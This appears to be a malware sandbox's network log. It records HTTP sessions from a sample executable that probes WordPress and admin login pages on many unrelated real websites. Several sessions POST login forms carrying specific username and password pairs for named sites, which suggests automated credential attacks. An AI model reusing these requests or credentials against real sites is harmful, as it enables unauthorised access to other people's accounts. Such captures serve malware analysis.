                                                                                                                                                                                                    Referer: https://gruporegiosafety.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 141
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC141OUTData Raw: 6c 6f 67 3d 63 6f 6d 70 72 61 73 26 70 77 64 3d 43 6f 6d 70 72 61 73 47 52 53 32 30 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=compras&pwd=ComprasGRS2023&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fgruporegiosafety.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC500INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC7692INData Raw: 32 38 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 28cd<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC2759INData Raw: 65 74 4c 6f 63 61 6c 65 44 61 74 61 28 20 6c 6f 63 61 6c 65 44 61 74 61 2c 20 64 6f 6d 61 69 6e 20 29 3b 0a 7d 20 29 28 20 22 64 65 66 61 75 6c 74 22 2c 20 7b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 2d 72 65 76 69 73 69 6f 6e 2d 64 61 74 65 22 3a 22 32 30 32 33 2d 31 31 2d 31 30 20 31 37 3a 31 38 3a 34 37 2b 30 30 30 30 22 2c 22 67 65 6e 65 72 61 74 6f 72 22 3a 22 47 6c 6f 74 50 72 65 73 73 5c 2f 34 2e 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 6c 6f 63 61 6c 65 5f 64 61 74 61 22 3a 7b 22 6d 65 73 73 61 67 65 73 22 3a 7b 22 22 3a 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 70 6c 75 72 61 6c 2d 66 6f 72 6d 73 22 3a 22 6e 70 6c 75 72 61 6c 73 3d 32 3b 20 70 6c 75 72 61 6c 3d 6e
                                                                                                                                                                                                    Data Ascii: etLocaleData( localeData, domain );} )( "default", {"translation-revision-date":"2023-11-10 17:18:47+0000","generator":"GlotPress\/4.0.0-alpha.11","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    474192.168.2.45224166.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC258OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC550INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://tra
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    475192.168.2.45216592.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC214OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://bunasta.eu/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC451INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 43 4d 53 53 45 53 53 49 44 38 30 66 39 66 64 33 66 3d 6d 76 63 64 38 6e 6a 72 61 71 76 70 64 65 6b 32 64 34 75 63 31 69 74 30 64 35 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.0 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTServer: Apache/2.4.38 (Debian)Set-Cookie: CMSSESSID80f9fd3f=mvcd8njraqvpdek2d4uc1it0d5; path=/; HttpOnlyExpires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: no-store, no-cache, must-revali
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6c 74 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 75 73 6c 61 70 69 73 20 6e 65 72 61 73 74 61 73 20 2d 20 42 75 6e 61 73 74 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6e 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="lt"><head> <meta charset="UTF-8"/> <title>Puslapis nerastas - Bunasta</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="https://www.buna
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 2d 38 30 70 78 3b 20 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 50 75 73 6c 61 70 69 73 20 6e 65 72 61 73 74 61 73 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 0a 0a 20 20 20 20 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 63 62 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: -80px; "> <div class="container"> <h1> Puslapis nerastas </h1> </div></section> <section> <div class="container"> <div class="fcbn-column">
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC4041INData Raw: 69 6e 66 6f 72 6d 61 63 69 6a c4 85 2e c2 a0 3c 2f 70 3e 0a 3c 70 3e 54 61 69 67 69 2c 20 6b 61 64 20 c5 a1 69 6f 73 20 75 c5 be 6b 6c 61 75 73 6f 73 20 66 6f 72 6d 61 20 75 c5 be 74 69 6b 72 69 6e 74 61 69 20 76 65 69 6b 74 c5 b3 2c 20 6a c5 ab 73 20 74 75 72 69 74 65 20 70 61 c5 be 79 6d c4 97 74 69 20 e2 80 9e 53 75 74 69 6e 6b 75 20 73 75 20 6e 61 c5 a1 75 6d 6f 20 73 6c 61 70 75 6b 61 69 73 e2 80 9c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6c 61 70 75 6b c5 b3 20 6e 61 75 64 6f 6a 69 6d 6f 20 70 61 72 69 6e 6b 74 79 73 3c 2f 68 32 3e 0a 3c 70 3e 4a c5 ab 73 20 67 61 6c
                                                                                                                                                                                                    Data Ascii: informacij.</p><p>Taigi, kad ios uklausos forma utikrintai veikt, js turite paymti Sutinku su naumo slapukais.</p> </div> <h2>Slapuk naudojimo parinktys</h2><p>Js gal


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    476192.168.2.4520723.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC213OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.knu.ac.in/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC215INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 77 70 2d 61 64 6d 69 6e 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheLocation: https://www.knu.ac.in/wp-admin/Content-Length: 299Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/wp-admin/">here</a>.</p><hr><address>Apache Server at


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    477192.168.2.45236254.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC174OUTGET /admin/pages/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC511INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 71 6e 36 65 68 36 6f 75 6d 64 6b 35 71 6d 6a 30 6d 35 65 66 68 65 37 72 75 72 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 53 65 63 75 72 69 74 79 2f 6c 6f 67 69 6e 3f 42 61 63 6b 55 52 4c 3d 25 32 46 61 64 6d 69 6e 25 32 46 70 61 67 65 73 25 32 46 0d 0a 78 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3a 20 53 69 6c 76 65 72 53 74 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:45 GMTServer: Apache/2.4.52 (Ubuntu)Set-Cookie: PHPSESSID=qn6eh6oumdk5qmj0m5efhe7rur; path=/; HttpOnlylocation: https://ce-logic.com/Security/login?BackURL=%2Fadmin%2Fpages%2Fx-controller: SilverStr


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    478192.168.2.452329162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC580INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 74 64 63 31 36 32 71 74 62 67 76 6a 72 30 35 65 71 35 61 6f 61 64 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: PHPSESSID=tdc162qtbgvjr05eq5aoadi
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    479192.168.2.45222434.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC401OUTPOST /wp-login.php?wpe-login=true HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=2f496c7315d7d730e29ea20c5d3dfb81
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 126
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC126OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 30 39 38 70 6f 69 30 39 38 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=098poi098&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftiswheels.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC517INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 36 32 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72 61 67
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6628Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePrag
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6628INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
